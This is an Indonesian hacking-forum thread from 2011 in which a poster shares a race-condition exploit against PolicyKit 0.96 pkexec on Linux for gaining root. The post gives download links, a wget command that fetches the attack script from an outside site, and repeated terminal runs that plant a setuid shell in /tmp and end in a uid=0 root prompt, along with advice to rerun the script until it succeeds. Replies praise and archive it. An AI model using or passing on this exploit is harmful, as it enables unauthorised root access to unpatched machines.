Home General Computer Multimedia Business Lounge
|
Eksploitasi Race Condition pada Policy Kit 0.96 di Linux untuk Mendapatkan Akses Root
|
|
11-05-2011, 03:39 PM
|
|||
|
|||
|
Eksploitasi Race Condition pada Policy Kit 0.96 di Linux untuk Mendapatkan Akses Root
Nich dapat yg baru lagi..
Hahaaaa.. semoga berguna.. : : :![]() eksploit bisa didownload di http://packetstormsecurity.org/files.../pkexec.sh.txt Polkitd kurang lebih sistemnya sama spt syslogd tapi fungsinya beda, klo policy kit terinstall akan dirun di bg utk mengatur privilege =========================== mywisdom@mywisdom-Vostro1310:~/www/.backups$ ps aux | grep polkitd root 1429 0.0 0.2 9452 4820 ? S Oct08 0:02 /usr/lib/policykit-1/polkitd =========================== nah pas pkexec dieksekusi (pkexec utk eksekusi perintah sbg user lain) dia akan berinteraksi dg polkitd, fungsinya serupa dg sudo. Policy kit 0.96 terkena masalah TOCTTOU (Time Of Check To Time Of Use). untuk lebih jelasnya silahkan lihat analisis dari source code di bawah ini: PHP Code: #!/bin/sheksploit di atas merupakan penyempurnaan kinerja dari exploit ini http://www.exploit-db.com/exploits/17932 ![]() pada polkit 0.96 exploit di atas berhasil menjalankan /bin/sh dg privilege root tapi sayangnya gagal melakukan set tty krn proses yang disalahgunakan sudah mati, berikut ini adalah penyempurnaan dari exploit tadi : ![]() PHP Code: mywisdom@mywisdom-Vostro1310:~/c/polkit$ wget jayakonstruksi.com/backupintsec/pkexec.shjika terjadi kegagalan dg pesan User of caller (0) does not match our uid (1000) , bisa dieksekusi ulang : mywisdom@mywisdom-Vostro1310:~/c/polkit$ ./pkexec.sh suid.c: In function ‘main’: suid.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’ /usr/bin/ld: cannot open output file /tmp/suid: Permission denied collect2: ld returned 1 exit status User of caller (0) does not match our uid (1000) your suid is on /tmp/suid make sure u move this !!! $ mywisdom@mywisdom-Vostro1310:~/c/polkit$ ./pkexec.sh suid.c: In function ‘main’: suid.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’ /usr/bin/ld: cannot open output file /tmp/suid: Permission denied collect2: ld returned 1 exit status User of caller (0) does not match our uid (1000) your suid is on /tmp/suid make sure u move this !!! $ exit mywisdom@mywisdom-Vostro1310:~/c/polkit$ ./pkexec.sh suid.c: In function ‘main’: suid.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’ /usr/bin/ld: cannot open output file /tmp/suid: Permission denied collect2: ld returned 1 exit status your suid is on /tmp/suid make sure u move this !!! # eksploit ini akan manjur pada policy kit 0.96 sebelum patch bulan april 2011: mywisdom@mywisdom-Vostro1310:~/c/polkit$ ls -lah /usr/bin/pkexec -rwsr-xr-x 1 root root 18K 2010-08-26 10:35 /usr/bin/pkexec jika di box target anda tidak terinstall policy kit exploit ini tidak akan berguna =================[Note] the first exploit for this is : http://www.exploit-db.com/exploits/17932/ but it's failed on pkexec 0.96: === mywisdom@mywisdom-Vostro1310:~/c$ ./17932 ============================= = PolicyKit Pwnage = = by zx2c4 = = Sept 2, 2011 = ============================= [+] Configuring inotify for proper pid. [+] Launching pkexec. # mywisdom@mywisdom-Vostro1310:~/c$ /bin/sh: i: not found # /bin/sh: Cannot set tty process group (No such process) mywisdom@mywisdom-Vostro1310:~/c$ =============================== so here's the other exploit by ev1lut10n: =========== mywisdom@mywisdom-Vostro1310:~/c$ ./pkexec.sh suid.c: In function ‘main’: suid.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’ your suid is on /tmp/suid make sure u move this !!! # id uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plu gdev),111(lpadmin),119(admin),122(sambashare),1000 (mywisdom) # ============== on failure message u can run it several times until success: ==== mywisdom@mywisdom-Vostro1310:~/c/polkit$ ./pkexec.sh suid.c: In function ‘main’: suid.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’ /usr/bin/ld: cannot open output file /tmp/suid: Permission denied collect2: ld returned 1 exit status User of caller (0) does not match our uid (1000) your suid is on /tmp/suid make sure u move this !!! $ mywisdom@mywisdom-Vostro1310:~/c/polkit$ ./pkexec.sh suid.c: In function ‘main’: suid.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’ /usr/bin/ld: cannot open output file /tmp/suid: Permission denied collect2: ld returned 1 exit status User of caller (0) does not match our uid (1000) your suid is on /tmp/suid make sure u move this !!! $ exit mywisdom@mywisdom-Vostro1310:~/c/polkit$ ./pkexec.sh suid.c: In function ‘main’: suid.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’ /usr/bin/ld: cannot open output file /tmp/suid: Permission denied collect2: ld returned 1 exit status your suid is on /tmp/suid make sure u move this !!! # =============== good luck.. :) saiia mw lagi nich..
|
|||
|
11-05-2011, 03:58 PM
|
|||
|
|||
|
RE: Eksploitasi Race Condition pada Policy Kit 0.96 di Linux untuk Mendapatkan Akses Root
waduuuh ..
mumet ae oms ![]() susah juga ngeroot ya oms. harus banyak-banyak belajar neh.
|
|||
|
11-05-2011, 04:17 PM
|
|||
|
|||
|
RE: Eksploitasi Race Condition pada Policy Kit 0.96 di Linux untuk Mendapatkan Akses Root
wew
nih omz dom...ini yang pernah di tujukin ke ane waktu itu pa bukan yaa.. ![]() ane lupa omz.. ![]() ane arsipin dulu omz..buat nambah bank arsip ane...
|
|||
|
11-05-2011, 04:24 PM
|
|||
|
|||
|
RE: Eksploitasi Race Condition pada Policy Kit 0.96 di Linux untuk Mendapatkan Akses Root
nice info kak, itu eksploit nya bener yang ini bukan kak http://packetstormsecurity.org/files/105...c-race.txt ?
|
|||
|
11-05-2011, 06:41 PM
|
|||
|
|||
|
RE: Eksploitasi Race Condition pada Policy Kit 0.96 di Linux untuk Mendapatkan Akses Root
ev1lution
|
|||
|
11-05-2011, 07:57 PM
|
|||
|
|||
| RE: Eksploitasi Race Condition pada Policy Kit 0.96 di Linux untuk Mendapatkan Akses Root | |||
|
11-06-2011, 01:46 AM
|
|||
|
|||
|
RE: Eksploitasi Race Condition pada Policy Kit 0.96 di Linux untuk Mendapatkan Akses Root
wuuiih Nice
Izin omz dom,,
|
|||
|
« Next Oldest | Next Newest »
|
| Topic Tools | ||||||
| ||||||
| Users Browsing |
| 1 Guest(s) |


: ![[Image: botnet.jpg]](http://jasaplus.com/ev1lut10n/botnet.jpg)
![[Image: botnet.jpg]](http://3.bp.blogspot.com/-YeF7cAQTv3I/TpHKpWDOTmI/AAAAAAAAArM/gzoyd_QTtMc/s1600/botnet.jpg)
![[Image: botnet.jpg]](http://3.bp.blogspot.com/-yoJUSXDW7iM/TpHLtJaj9wI/AAAAAAAAArU/qDcPIaE7MIo/s1600/botnet.jpg)
lagi nich..





nih omz dom...









